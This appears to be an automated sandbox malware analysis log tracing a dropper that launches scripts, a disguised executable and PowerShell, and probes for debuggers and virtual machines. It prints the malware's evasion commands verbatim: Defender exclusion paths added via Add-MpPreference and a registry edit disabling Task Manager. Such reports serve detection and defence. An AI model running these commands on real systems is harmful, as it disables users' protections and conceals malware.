Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QEeosldM.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jBpuMXxn.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DhKAQyQA.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vdXshwoU.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HTmgdJna.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CNRzgtSC.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\HOdrnIxw.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eNXvjbiz.log	Jump to dropped file
Source: C:\RuntimeDll\cef_process.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hCXTblqe.log	Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\djqniAFy.log	Jump to dropped file

Source: C:\RuntimeDll\cef_process.exe TID: 7724	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132	Thread sleep count: 3282 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1264	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4128	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152	Thread sleep count: 3614 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1424	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6492	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6048	Thread sleep count: 2881 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1664	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6500	Thread sleep count: 3610 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6456	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6072	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960	Thread sleep count: 3129 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2548	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6196	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\RuntimeDll\cef_process.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CBA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00CBA69B
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CCC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00CCC220
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CDB348 FindFirstFileExA,	0_2_00CDB348

Source: C:\Users\user\Desktop\kBY9lgRaca.exe

Code function: 0_2_00CCE6A3 VirtualQuery,GetSystemInfo,

0_2_00CCE6A3

Source: C:\RuntimeDll\cef_process.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\RuntimeDll\cef_process.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: wscript.exe, 00000002.00000002.1459542926.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\FUx
Source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2756809668.000000001B960000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\kBY9lgRaca.exe

API call chain: ExitProcess graph end node

graph_0-25239

Source: C:\RuntimeDll\cef_process.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\RuntimeDll\cef_process.exe

Code function: 8_2_00007FFAAC7436FA rdtsc

8_2_00007FFAAC7436FA

Source: C:\Users\user\Desktop\kBY9lgRaca.exe

Code function: 0_2_00CCF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00CCF838

Source: C:\Users\user\Desktop\kBY9lgRaca.exe

Code function: 0_2_00CD7DEE mov eax, dword ptr fs:[00000030h]

0_2_00CD7DEE

Source: C:\Users\user\Desktop\kBY9lgRaca.exe

Code function: 0_2_00CDC030 GetProcessHeap,

0_2_00CDC030

Source: C:\RuntimeDll\cef_process.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CCF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00CCF838
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CCF9D5 SetUnhandledExceptionFilter,	0_2_00CCF9D5
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CCFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00CCFBCA
Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Code function: 0_2_00CD8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00CD8EBD

Source: C:\RuntimeDll\cef_process.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe'
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe'
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\RuntimeDll\mOBsSQwwQhAobhYfNDABCsnt.exe'
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\lsass.exe'
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\RuntimeBroker.exe'
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe'	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe'	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\RuntimeDll\mOBsSQwwQhAobhYfNDABCsnt.exe'	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\lsass.exe'	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\RuntimeBroker.exe'	Jump to behavior

Source: C:\Users\user\Desktop\kBY9lgRaca.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\RuntimeDll\PBs3ExWWgPs.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\RuntimeDll\er5JwegoF0epdZ7Hiy1grVzXqFtCRJ8c.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\RuntimeDll\cef_process.exe "C:\RuntimeDll/cef_process.exe"	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe'	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe'	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\RuntimeDll\mOBsSQwwQhAobhYfNDABCsnt.exe'	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windowspowershell\Modules\lsass.exe'	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\jre-1.8\bin\RuntimeBroker.exe'	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0MaLlOrxiN.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe "C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe"

Source: C:\Users\user\Desktop\kBY9lgRaca.exe

Code function: 0_2_00CCF654 cpuid

0_2_00CCF654

Source: C:\Users\user\Desktop\kBY9lgRaca.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00CCAF0F

Source: C:\RuntimeDll\cef_process.exe	Queries volume information: C:\RuntimeDll\cef_process.exe VolumeInformation	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\RuntimeDll\cef_process.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
